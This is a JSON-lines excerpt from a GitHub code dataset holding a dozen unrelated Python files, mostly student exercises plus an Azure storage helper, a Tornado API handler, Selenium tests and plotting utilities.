elif self.opt['lr_decay'] == 'linear2exp':\n if epoch < self.opt['turning_point'] + 1:\n # learning rate decay as 95%\n # at the turning point (1 / 95% = 1.0526)\n lr = self.opt['lr'] * (\n 1 - epoch / int(self.opt['turning_point'] * 1.0526))\n else:\n lr *= self.opt['gamma']\n elif self.opt['lr_decay'] == 'schedule':\n if epoch in self.opt['schedule']:\n lr *= self.opt['gamma']\n else:\n raise ValueError('Unknown lr mode {}'.format(self.opt['lr_decay']))\n # set learning rate\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n return lr\n","repo_name":"yumingj/Text2Human","sub_path":"models/hierarchy_vqgan_model.py","file_name":"hierarchy_vqgan_model.py","file_ext":"py","file_size_in_byte":14780,"program_lang":"python","lang":"en","doc_type":"code","stars":783,"dataset":"github-code","pt":"75"} +{"seq_id":"18738983185","text":"\n######################################################################\n#\n# Business logic is intended to possess data handling functionality\n# separated from GUI code, i.e.separated from Dash-related code\n# and visualization format (e.g. plotly when graphing data)\n#\n# Rule: No dash* import allowed\n#\n# Query database/input for relevant data and necessary ad-hoc\n# calculations for data.\n#\n######################################################################\n\nimport os\nimport requests\nimport pandas as pd\nfrom azure.storage.filedatalake import (\n FileSystemSasPermissions,\n generate_file_system_sas,\n)\nfrom datetime import datetime, timedelta\n\n\nclass SurfaceModel:\n\n source_db = {\n \"1\": \"OW\",\n \"2\": \"PetrelStudio\"\n }\n\n COLORMAP_OPTIONS = {\n \"1\": \"Rainbow\",\n \"2\": \"Physics\",\n \"3\": \"Porosity\",\n \"4\": \"Permeability\",\n \"6\": \"Time/Depth\",\n \"7\": \"Stratigraphy\",\n \"8\": \"Facies\",\n \"9\": \"GasOilWater\",\n \"10\": \"GasWater\",\n \"11\": \"OilWater\",\n \"12\": \"Accent\",\n }\n\n @staticmethod\n def get_user_project(token, projects_df):\n GRAPH_GROUP_URL = os.environ[\"GRAPH_GROUP_URL\"]\n headers = {'Authorization': 'Bearer ' +token}\n result = requests.get( # Use token to call downstream api\n GRAPH_GROUP_URL,\n headers=headers,\n ).json()\n\n resultNextLink = result['@odata.nextLink']\n joined_result = result['value']\n i = 0\n while resultNextLink:\n try:\n nextpageUsersUrl = resultNextLink\n rNext = requests.get(nextpageUsersUrl, headers=headers)\n resultNext = rNext.json()\n joined_result = [*joined_result, *resultNext['value']]\n resultNextLink = resultNext['@odata.nextLink']\n i += 1\n except KeyError:\n print('this is the last page')\n break\n\n projects_df.objectId = projects_df.objectId.str.split(',')\n projects_df = projects_df.explode('objectId')\n\n df = pd.json_normalize(joined_result)\n\n df = df.rename(columns={\"id\": \"objectId\"})\n df = df[['objectId']]\n df_res = pd.merge(df, projects_df, on='objectId')\n return df_res\n\n @staticmethod\n def get_server_names(df):\n df = df[['sourceProjectId', 'sourceDatabase']].drop_duplicates(\n subset=['sourceDatabase'], keep='last')\n res = df.to_dict(orient='records')\n options = [{'label': i['sourceDatabase'], 'value': i['sourceProjectId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_project_names(df):\n df = df[['sourceProject', 'sourceProjectId']].drop_duplicates(\n subset=['sourceProjectId'], keep='last') \n res = df.to_dict(orient='records')\n options = [{'label': i['sourceProject'], 'value': i['sourceProjectId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_iset_names(df):\n res = df.to_dict(orient='records')\n options = [{'label': i['interpretSetName'], 'value': i['interpretationSetId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_grid_names(df):\n res = df.to_dict(orient='records')\n options = [{'label': i['surfaceName'] + \" (GRID_ID: \" + str(i['gridId']) + ')', 'value': i['gridId']}\n for i in res]\n sorted_options = sorted(options, key=lambda x: x[\"label\"])\n return sorted_options\n\n @staticmethod\n def get_sas_token(path):\n AZURE_ACC_NAME = os.environ[\"AZURE_ACC_NAME\"]\n AZURE_PRIMARY_KEY = os.environ[\"AZURE_PRIMARY_KEY\"]\n AZURE_CONTAINER = os.environ[\"AZURE_CONTAINER\"]\n ENV_SUF = os.environ[\"ENV_SUF\"]\n\n token = generate_file_system_sas(\n AZURE_ACC_NAME,\n AZURE_CONTAINER,\n AZURE_PRIMARY_KEY,\n FileSystemSasPermissions(\n write=False, read=True, delete=False),\n datetime.utcnow() + timedelta(days=1),\n )\n\n blob_url = 'https://' + AZURE_ACC_NAME + '.blob.core.windows.net/' + \\\n AZURE_CONTAINER + '/' + ENV_SUF + path + '?' + token\n\n return blob_url\n","repo_name":"equinor/webviz-spatialdb-v1","sub_path":"webviz_plugin/plugins/surface_map_viewer/_business_logic.py","file_name":"_business_logic.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72733845681","text":"num = int(input(\"Please enter a number : \"))\nn = [\"0\"]\nm = num * n\na = []\nb = ''\nfor i in range(num):\n m[i] = \"1\"\n a.append(m)\n m = num * n\nfor i in a:\n for ii in i:\n b += ii\n if len(i) == num:\n print(b)\n b = ''\n \n\n\n\n \n \n \n \n\n\n\n\n\n","repo_name":"y43560681/y43560681-270201054","sub_path":"lab6/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30037542628","text":"import matplotlib.pyplot as plt\nimport ForwardSelection\nimport BackwardDeletion\nimport SamSelection\nimport LoadData \ndef formatFeatures(features):\n\tformatted = \"{\"\n\tfor f in range(len(features) - 1):\n\t\tformatted += str(features[f]) + \",\"\n\tformatted += str(features[len(features) - 1])\n\tformatted += \"}\"\n\treturn formatted\ndef userPrompt():\n\tprint(\"Welcome to Sam's Feature Selection Algorithm.\")\n\tfile_loc = input(\"Type in the path of the file to test: \")\n\talgorithm_choice = int(input(\"Enter the number for the algorithm you would like to run.\\n\t1) Forward Selection\\n\t2) Backward Elimination\\n\t3) Sam's Algorithm\\n\\n\"))\n\treturn file_loc, algorithm_choice\n\ndef plot(accuracy_at_level):\n\tfig = plt.figure()\n\tl = list(range(1,len(accuracy_at_level) + 1))\n\tplt.plot(l, accuracy_at_level, 'go')\t\n\tplt.savefig('/Users/samueldominguez/Downloads/2dplt.png')\n\nif __name__ == \"__main__\":\n\tfile_loc, algorithm_choice = userPrompt()\n\tdata = LoadData.loadData(file_loc)\n\tLoadData.normalizeData(data)\n\tN = len(data)\n\tM = len(data[0])\n\tprint(\"There are \" + str(N) + \" datapoints with \" + str(M) + \" features.\")\n\tprint(\"Data has been normalized...\")\n\talgos = [\"Forward Selection\",\"Backward Elemination\",\"Sam's Algorithm\"]\n\tprint(\"Running Nearest Neighboor with \" + algos[algorithm_choice - 1] + \" on the dataset.\\n\")\n\taccuracy_at_level = []\t\n\tfeatures = []\n\taccuracy = -1\n\tif (algorithm_choice == 1):\n\t\t# forward\n\t\tfeatures, accuracy, accuracy_at_level = ForwardSelection.forwardSelection(data)\n\t\tprint(\"A plot of accuracy over number of features is being made and saved.\")\n\t\tplot(accuracy_at_level)\n\telif (algorithm_choice == 2):\n\t\t# backwards\n\t\tfeatures, accuracy, accuracy_at_level = BackwardDeletion.backwardDeletion(data)\n\t\tprint(\"A plot of accuracy over number of features is being made and saved.\")\n\t\tplot(accuracy_at_level)\n\telse:\n\t\t# sam's\n\t\tfeatures, accuracy = SamSelection.samSelection(data);\n\tformatted_features = formatFeatures(features)\n\tprint(\"Finished search!! The best feature subset is \" + formatted_features + \" which has an accuracy of \" + str(accuracy*100) + \"%\")\n","repo_name":"sdomi003/NearestNeighboorFeatureSelection","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15802796991","text":"def minPathSum(grid):\n m = len(grid)\n n = len(grid[0])\n dp = [[0 for i in range(n)] for j in range(m)] \n for i in range(m):\n for j in range(n):\n if i == 0 and j == 0:\n dp[i][j] = grid[i][j]\n elif i == 0 and j != 0:\n dp[i][j] = grid[i][j] + dp[i][j-1]\n elif i != 0 and j == 0:\n dp[i][j] = grid[i][j] + dp[i-1][j]\n else:\n dp[i][j] = grid[i][j] + min(dp[max(i-1, 0)][j], dp[i][max(j-1, 0)])\n return dp[m-1][n-1]\n\n# same funda, visualize fo one cell,, how to get min sum,, obvio above and left path check and who\n# ever is min, consider it..like unique path. main apprach is think of smaller ip. this is top\n# down approach of DP","repo_name":"AnchalNigam/Code-Time","sub_path":"DP/new_journey/min_path_sum.py","file_name":"min_path_sum.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8766846371","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\nfrom common import config\nfrom testdata.olsm.data_enterprise_modify_introduction import *\nfrom action.action_login import Login\nfrom action.enterprise.action_enterprise_introduction import EnterpriseIntroduction\nimport unittest\nimport time\n\nclass TestEnterpriseModifyIntroduction(unittest.TestCase):\n u'''\n 测试企业修改企业介绍、企业文化、企业组织架构等\n '''\n def setUp(self):\n self.login_page = Login()\n self.modify_introduction_page = EnterpriseIntroduction()\n\n def tearDown(self):\n time.sleep(1)\n self.login_page.quit()\n\n\n def test_modify_introduction_case1(self):\n u'''测试企业修改企业介绍内容'''\n self.assertTrue(self.login_page.open_browser(config.BASE_URL),u\"打开首页失败\")\n r = self.login_page.login(**test_modify_introduction_case1)\n self.assertTrue(r.result, r.msg)\n r = self.modify_introduction_page.modify_introduction(**test_modify_introduction_case1)\n self.assertTrue(r.result, r.msg)\n\n def test_modify_introduction_case2(self):\n u'''测试企业修改企业文化内容'''\n self.assertTrue(self.login_page.open_browser(config.BASE_URL),u\"打开首页失败\")\n r = self.login_page.login(**test_modify_introduction_case2)\n self.assertTrue(r.result, r.msg)\n r = self.modify_introduction_page.modify_culture(**test_modify_introduction_case2)\n self.assertTrue(r.result, r.msg)\n\n\n def test_modify_introduction_case3(self):\n u'''测试企业修改企业组织架构内容'''\n self.assertTrue(self.login_page.open_browser(config.BASE_URL),u\"打开首页失败\")\n r = self.login_page.login(**test_modify_introduction_case3)\n self.assertTrue(r.result, r.msg)\n r = self.modify_introduction_page.modify_structure(**test_modify_introduction_case3)\n self.assertTrue(r.result, r.msg)\n\nif __name__ == '__main__':\n #logging.basicConfig(level=logging.DEBUG)\n\n a = unittest.TestSuite()\n a.addTests(unittest.makeSuite(TestEnterpriseModifyIntroduction))\n b = unittest.TextTestRunner()\n b.run(a)\n #unittest.main()","repo_name":"sunyanhui/autotest","sub_path":"veeker/testsuite/olsm/test_enterprise_modify_introduction.py","file_name":"test_enterprise_modify_introduction.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18313882405","text":"\"\"\"\nGiven a sorted array with Duplicates . Write a program to find LOWER\nBOUND of a TARGET using Binary search Method .\nReturn Index corresponding the element of lower bound element.\nExample :\nInput : - arr = [1,1,1,2,2,3,3,5,5,5,7,7] , Target = 4\nOutput : - 6\ndef Lower_Bound(arr , target):\n\"\"\" \n# write code here \n\narr = [1,1,1,2,2,3,3,5,5,5,7,7]\ntarget = 4\n\ndef Lower_Bound(arr,target):\n prev = -1 \n for i in range (0,len(arr)):\n if (target==arr[i]):\n return i \n elif arr[i] > target:\n return prev\n prev = i \n\nprint(Lower_Bound(arr,target))","repo_name":"aabhishek-chaurasia-au17/MyCoding_Challenge","sub_path":"coding-challenges/week07/day04/Q.1.py","file_name":"Q.1.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"7917427757","text":"import matplotlib.pyplot as plt\nfrom math import pi\nimport math\nimport numpy as np\nimport cv2\nimport io\nfrom PIL import Image\nimport pandas as pd\n\nclass pieradarplot:\n # Set data\n def __init__(self):\n self.group = ['0-30', '30-60', '60-90', '90-120', '120-150', '150-180', '180-210', '210-240', '240-270',\n '270-300', '300-330', '330-360']\n self.colors = ['rosybrown', 'chocolate', 'orange', 'blue', 'pink', 'red', 'lime', 'indigo', 'teal', 'tomato', 'lawngreen', 'aqua']\n\n def fig2img(self, fig):\n buf = io.BytesIO()\n fig.savefig(buf)\n buf.seek(0)\n img = Image.open(buf)\n return img\n\n def avgValues(self, values):\n sum = np.sum(values)\n if sum != 0:\n for i in range(len(values)):\n values[i] = int((values[i]/sum)*100)\n return values\n\n def getanglefromindex(self, index):\n if index == 0:\n return -15, self.colors[index]\n elif index == 1:\n return -45, self.colors[index]\n elif index == 2:\n return -75, self.colors[index]\n elif index == 3:\n return -105, self.colors[index]\n elif index == 4:\n return -135, self.colors[index]\n elif index == 5:\n return -165, self.colors[index]\n elif index == 6:\n return 15, self.colors[index]\n elif index == 7:\n return 45, self.colors[index]\n elif index == 8:\n return 75, self.colors[index]\n elif index == 9:\n return 105, self.colors[index]\n elif index == 10:\n return 135, self.colors[index]\n elif index == 11:\n return 165, self.colors[index]\n\n # def plotblockdirection(self, directionarr, magnitudearr):\n # x = range(10)\n # y = range(10)\n # dirmagarr = np.multiply(directionarr,magnitudearr)\n # max = np.amax(dirmagarr)\n # rng = max * 0.25\n # blocksize = dirmagarr.shape[0]\n # # maxVal = np.amax(directionarr)\n # # directionarr = directionarr/maxVal\n # fig, ax = plt.subplots(nrows=blocksize, ncols=blocksize)\n #\n # for i in range(blocksize):\n # for j in range(blocksize):\n # ax[i, j].axis('off')\n # directions = dirmagarr[i][j]\n # flat = directions.flatten()\n # flat.sort()\n # length = flat[-1]\n # length2 = flat[-2]\n # if length > rng and length2 > rng:\n # index = np.where(directions == length)\n # index2 = np.where(directions == length2)\n # angle, clr = self.getanglefromindex(index[0][0])\n # angle2, clr2 = self.getanglefromindex(index2[0][0])\n # endy = math.sin(math.radians(angle)) * 0.75\n # endx = math.cos(math.radians(angle)) * 0.75\n # endy2 = math.sin(math.radians(angle2)) * 0.75\n # endx2 = math.cos(math.radians(angle2)) * 0.75\n # ax[i, j].set_ylim(ymin=-1, ymax=1)\n # ax[i, j].set_xlim(xmin=-1, xmax=1)\n # ax[i, j].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n # ax[i, j].arrow(0, 0, endx2, endy2, fc=clr2, ec=clr2, head_width=0.3, head_length=0.2)\n # else:\n # index = np.where(directions == length)\n # angle, clr = self.getanglefromindex(index[0][0])\n # endy = math.sin(math.radians(angle)) * 0.75\n # endx = math.cos(math.radians(angle)) * 0.75\n # ax[i, j].set_ylim(ymin=-1, ymax=1)\n # ax[i, j].set_xlim(xmin=-1, xmax=1)\n # ax[i, j].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n #\n # img = self.fig2img(fig)\n # plt.close()\n # img = np.asarray(img)\n # img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n # cv2.imshow(\"plot\", img)\n # cv2.waitKey(1)\n\n def plotblockdirection(self, directionarr, magnitudearr):\n x = range(10)\n y = range(10)\n dirmagarr = np.multiply(directionarr,magnitudearr)\n blocksize = dirmagarr.shape[0]\n pdrow = np.zeros_like(dirmagarr)\n max = np.amax(dirmagarr)\n rng = max * 0.05\n fig, ax = plt.subplots(nrows=blocksize, ncols=blocksize)\n counter = 0\n for i in range(blocksize):\n for j in range(blocksize):\n ax[j, i].axis('off')\n directions = dirmagarr[i][j]\n flat = directions.flatten()\n flat.sort()\n length = flat[-1]\n length2 = flat[-2]\n if length > rng and length2 > rng:\n index = np.where(directions == length)\n index2 = np.where(directions == length2)\n pdrow[j][i][index] += 1\n pdrow[j][i][index2] += 1\n angle, clr = self.getanglefromindex(index[0][0])\n angle2, clr2 = self.getanglefromindex(index2[0][0])\n endy = math.sin(math.radians(angle)) * 0.75\n endx = math.cos(math.radians(angle)) * 0.75\n endy2 = math.sin(math.radians(angle2)) * 0.75\n endx2 = math.cos(math.radians(angle2)) * 0.75\n ax[j, i].set_ylim(ymin=-1, ymax=1)\n ax[j, i].set_xlim(xmin=-1, xmax=1)\n ax[j, i].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n ax[j, i].arrow(0, 0, endx2, endy2, fc=clr2, ec=clr2, head_width=0.3, head_length=0.2)\n elif length > rng:\n index = np.where(directions == length)\n pdrow[j][i][index] += 1\n angle, clr = self.getanglefromindex(index[0][0])\n endy = math.sin(math.radians(angle)) * 0.75\n endx = math.cos(math.radians(angle)) * 0.75\n ax[j, i].set_ylim(ymin=-1, ymax=1)\n ax[j, i].set_xlim(xmin=-1, xmax=1)\n ax[j, i].arrow(0, 0, endx, endy, fc=clr, ec=clr, head_width=0.3, head_length=0.2)\n img = self.fig2img(fig)\n plt.close()\n img = np.asarray(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n cv2.imshow(\"plot\", img)\n cv2.waitKey(1)\n dirs = np.split(pdrow.flatten(), (blocksize ** 2))\n endarr =[]\n for dir in dirs:\n index = np.where(dir == 1)\n if len(index[0]) == 0:\n endarr.append(0)\n endarr.append(0)\n elif len(index[0]) == 1:\n endarr.append(index[0][0])\n endarr.append(0)\n elif len(index[0]) == 2:\n endarr.append(index[0][0])\n endarr.append(index[0][1])\n # print(\"Enter the input : \")\n # value = input()\n endarr.append(3)\n return endarr\n\n def getpieradarplot(self, values):\n values = self.avgValues(values)\n categories = self.group\n N = len(categories)\n angles = np.linspace(0, 2 * pi, N, endpoint=False)\n angles_mids = angles + (angles[1] / 2)\n\n fig = plt.figure(figsize=(6, 6))\n ax = plt.subplot(111, polar=True)\n ax.tick_params(\n axis='both', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=False)\n ax.axis('off')\n ax.set_theta_direction(-1)\n # ax.set_theta_offset(0)\n # ax.set_xticks(angles_mids)\n # ax.set_xticklabels(categories)\n # ax.xaxis.set_minor_locator(FixedLocator(angles))\n\n # Draw ylabels\n # ax.set_rlabel_position(90)\n # ax.set_yticks([20, 40, 60, 80, 100])\n # ax.set_yticklabels([\"20\", \"40\", \"60\", \"80\", \"100\"], color=\"black\", size=8)\n # ax.set_ylim(0, 100)\n\n for i in range(12):\n ax.bar(angles_mids[i], values[i], width=angles[1] - angles[0],\n facecolor=self.colors[i], alpha=0.7, edgecolor='k', linewidth=1)\n\n ax.grid(False, axis='x', which='minor')\n ax.grid(False, axis='x', which='major')\n ax.grid(False, axis='y', which='major')\n ax.grid(False, axis='y', which='minor')\n img = self.fig2img(fig)\n plt.close()\n img = np.asarray(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n img = cv2.resize(img,(224,224))\n return img\n\n# x = pieradarplot()\n# x.plotblockdirection([9, 25, 19, 8, 8, 14, 20, 60, 34, 17, 8, 2])","repo_name":"alvachaitanya/CrowdMotion","sub_path":"utils/pieradarplot.py","file_name":"pieradarplot.py","file_ext":"py","file_size_in_byte":8841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20103547398","text":"class Person:\n '''Тут мы как бы пишет ля-ля тополя про сам класс.'''\n\n population = 0\n\n def __init__(self, fname: str, lname: str, old: int):\n '''Инициализация данных.\n Вызывается первым делом при создании экземпляра класса'''\n self.name1 = fname\n self.name2 = lname\n self.age = old\n\n Person.population += 1\n\n def __del__(self):\n '''Вызывается при удалении объекта - экземпляра класса'''\n print(f'{self.name1} ушел, увы :(')\n\n Person.population -= 1\n\n if Person.population == 0:\n print(f'Конец программы, все ушли')\n\n def say_hi(self) -> str:\n '''Крутая функция расскажет о тебе.'''\n return f'Hi, I\\'m {self.name1}. I know you! Your Last name is {self.name2}. Your age is {self.age}'\n\n @staticmethod # Декоратор для ститичного метода класса\n def how_many():\n '''Выводит численность людей. Необходимо указать, что это статический метод класса.\n Делается вот так после функции: how_many = staticmetod(how_many)'''\n print(f'Сейчас у нас в гостях - {Person.population}')\n # how_many = staticmethod(how_many)\n\n# ========================================================================================================\n\n\nprint(f'\\n{Person.say_hi.__doc__}')\n# print(Person.__init__.__annotations__) # Выводит аннотацию к magic method __init__\n# print(Person.say_hi.__annotations__)\n\nAndGr = Person('Andrey', 'Grachev', 30)\nprint(AndGr.say_hi())\n# print(f'Пополяция людей достигла - {AndGr.population}')\nPerson.how_many()\n\nYuriLop = Person('Yuri', 'Lopuhin', 32)\nprint(YuriLop.say_hi())\nPerson.how_many()\n\nAlekseyZol = Person('Aleksey', 'Zolotuhin', 34)\nprint(AlekseyZol.say_hi())\nPerson.how_many()\n","repo_name":"OrganizmRU/PyTest","sub_path":"using_class.py","file_name":"using_class.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40286125282","text":"from motorengine import DESCENDING\nfrom app.models.packages import UserPackage, Package\nfrom app.models.schedules import BookedSchedule\nfrom app.models.users import User\nfrom app.helper import create_at_gmt8\nimport tornado.escape\n\ndef find(self):\n user_id = None\n if 'ES-USER-ID' in self.request.headers:\n user_id = self.request.headers['ES-USER-ID']\n else:\n if self.get_secure_cookie('loginUserID'):\n user_id = str(self.get_secure_cookie('loginUserID'), 'UTF-8')\n\n if user_id:\n user = yield User.objects.get(user_id)\n\n if user:\n\n maxScheds = yield BookedSchedule.objects.filter(user_id=user._id).count()\n maxTrans = yield UserPackage.objects.filter(user_id=user._id).count()\n\n schedPage = 0\n transPage = 0\n if self.get_argument('schedPage'):\n schedPage = int(self.get_argument('schedPage'))\n if self.get_argument('transPage'):\n transPage = int(self.get_argument('transPage'))\n\n schedules = yield BookedSchedule.objects.order_by(\"update_at\", direction=DESCENDING) \\\n .filter(user_id=user._id) \\\n .skip(schedPage * 10).limit(10).find_all()\n transactions = yield UserPackage.objects.order_by(\"update_at\", direction=DESCENDING) \\\n .filter(user_id=user._id) \\\n .skip(transPage * 10).limit(10).find_all()\n\n transactions = create_at_gmt8(transactions)\n\n self.render_json({\n 'schedules' : schedules,\n 'transactions' : transactions,\n 'schedsTotal' : maxScheds / 10,\n 'transTotal' : maxTrans / 10\n })\n else:\n self.finish();\n else:\n self.set_status(403)\n self.write('Please sign up or log in to your Electric account.')\n self.finish()\n \n","repo_name":"baseup/electric-studio","sub_path":"app/controllers/api/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70006670324","text":"#!/usr/bin/env python3\n# doublylinkedlist.py\n# Author : Shipra\n\nclass Node():\n def __init__(self,prev=None, data=None, next=None):\n self.data = data\n self.next = next\n self.prev = prev\n\nclass DoublyLL():\n def __init__(self,head=None):\n self.head = head\n\n\n def insertBeginning(self, data):\n if self.head == None:\n node = Node(None,data,self.head)\n self.head = node\n else:\n node = Node(None,data, self.head)\n self.head = node\n self.head.prev = node\n\n def insertEnd(self, data):\n if self.head is None:\n self.insertBeginning(data)\n return\n itr = self.head\n while itr.next:\n itr = itr.next\n node = Node(data, None)\n itr.next = node\n\n def NewList(self, newlist):\n i = len(newlist) - 1\n while i >= 0:\n self.insertBeginning(newlist[i])\n i -= 1\n\n def listlength(self):\n counter = 1\n itr = self.head\n while itr.next:\n counter += 1\n itr = itr.next\n return counter\n\n\n\n\n def printllforward(self):\n if self.head == None:\n return\n\n itr = self.head\n\n while itr:\n print(itr.data)\n itr = itr.next\n\n def getLastnode(self):\n itr = self.head\n\n while itr.next:\n itr = itr.next\n return itr\n\n\n\n def printllbackward(self):\n if self.head == None:\n return\n\n itr = self.getLastnode()\n\n while itr:\n print(itr.data)\n itr = itr.prev\n\n\ndoublelist = DoublyLL()\ndoublelist.insertBeginning(9)\ndoublelist.insertBeginning(8)\ndoublelist.insertBeginning(6)\ndoublelist.printllforward()\ndoublelist.printllbackward()\n\n\n\n\n\n\n\n\n","repo_name":"goshipra/Algoritms","sub_path":"leetcodesolutions/doublylinkedlist.py","file_name":"doublylinkedlist.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"773702364","text":"res = input(\"Enter your list: \").split()\r\nit = 0\r\n\r\n\r\ndef convert_list(ress, iterator):\r\n \"\"\"\r\n This function is converting all elements of list into float type\r\n\r\n Args:\r\n ress: list, that is converting\r\n iterator: integer, iterator, that points on element in list\r\n\r\n Returns:\r\n ress: converted list\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(convert_list([\"1\", \"2\", \"3\"], 0))\r\n [1, 2, 3]\r\n print(convert_list([\"a\", \"2\", \"3\"], 0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n if iterator < len(ress):\r\n ress[iterator] = float(ress[iterator])\r\n return convert_list(ress, iterator + 1)\r\n return ress\r\n\r\n\r\nres1 = convert_list(res, it)\r\nmax_el = res1[it]\r\n\r\n\r\ndef max_f(inp_list, iterator):\r\n \"\"\"\r\n This function is calculating max element\r\n\r\n Args:\r\n inp_list: list, where max is searching\r\n iterator: integer, iterator, that points on element in list\r\n\r\n Returns:\r\n max_el: integer\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(max_f([1,2,3,4],0))\r\n \"4\"\r\n print(max_f([1,2,\"a\",3],0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n global max_el\r\n if iterator < len(inp_list)-1:\r\n if max_el < inp_list[iterator+1]:\r\n max_el = inp_list[iterator + 1]\r\n return max_f(inp_list, iterator + 1)\r\n else:\r\n return max_f(inp_list, iterator + 1)\r\n return max_el\r\n\r\n\r\nmax_elem = max_f(res1, it)\r\ntest = []\r\n\r\n\r\ndef del_max_el(resa, max_element, iterator):\r\n \"\"\"\r\n This function is deleting all elements, which values are equal to the value of max element\r\n\r\n Args:\r\n resa: list, where second max is searching\r\n iterator: integer, iterator, that points on element in list\r\n max_element: first max_element\r\n\r\n Returns:\r\n test: list, list without first max element\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(del_max_el([1, 2, 3, 4], 4, 0))\r\n [1, 2, 3]\r\n print(del_max_el([1, \"a\", 3, 4], 4, 0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n global test\r\n if iterator < len(resa) - 1:\r\n if resa[iterator] != max_element:\r\n test.append(resa[iterator])\r\n return del_max_el(resa, max_element, iterator + 1)\r\n else:\r\n return del_max_el(resa, max_element, iterator + 1)\r\n elif iterator == len(resa)-1:\r\n if resa[iterator] != max_element:\r\n test.append(resa[iterator])\r\n return test\r\n\r\n\r\ndel_max_el(res1, max_elem, it)\r\nit = 0\r\n\r\n\r\n\r\n\r\ndef sec_max_f(inp_list, iterator):\r\n \"\"\"\r\n This function is calculating second max element element\r\n\r\n Args:\r\n inp_list: list, where second max is searching\r\n iterator: integer, iterator, that points on element in list\r\n\r\n Returns:\r\n sec_max_el: integer\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(sec_max_f([1, 2, 3], 0))\r\n \"3\"\r\n print(sec_max_f([1, 2, \"b\"], 0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n global sec_max_el\r\n if iterator < len(inp_list) - 1:\r\n if sec_max_el < inp_list[iterator+1]:\r\n sec_max_el = inp_list[iterator + 1]\r\n return sec_max_f(inp_list, iterator + 1)\r\n else:\r\n return sec_max_f(inp_list, iterator + 1)\r\n return sec_max_el\r\n\r\nif len(test) > 0:\r\n sec_max_el = test[it]\r\n print(\"Second max element is:\", sec_max_f(test, it))\r\nelse:\r\n print(\"The list does not have second max element.\")\r\n\r\n","repo_name":"SergeyBondarenko/amis_python71","sub_path":"km71/Bondarenko_Sergii/12/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"21287588636","text":"import setuptools\n\nwith open('Readme.md', 'r') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"arpys\",\n version=\"0.0.1\",\n author=\"Kyle Gordon\",\n author_email=\"kgord831@gmail.com\",\n description=\"ARPES analysis with python and xarray\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"kgord831/arpys","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70698429044","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import redirect, render\nfrom django.template import loader\nfrom django.views.generic import ListView\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\n\nfrom reservations.decorators import user_passes_test\nfrom reservations.forms import AdminReservationForm\nfrom reservations.models import Person\nfrom reservations.models import Reservation\nfrom reservations.models import ReservationStatus\nfrom reservations.permissions import ReservationPermission\nfrom reservations.serializers import *\nfrom reservations.services import ReservationService\nfrom reservations.settings import DEFAULT_PAGE_SIZE\n\n\nclass 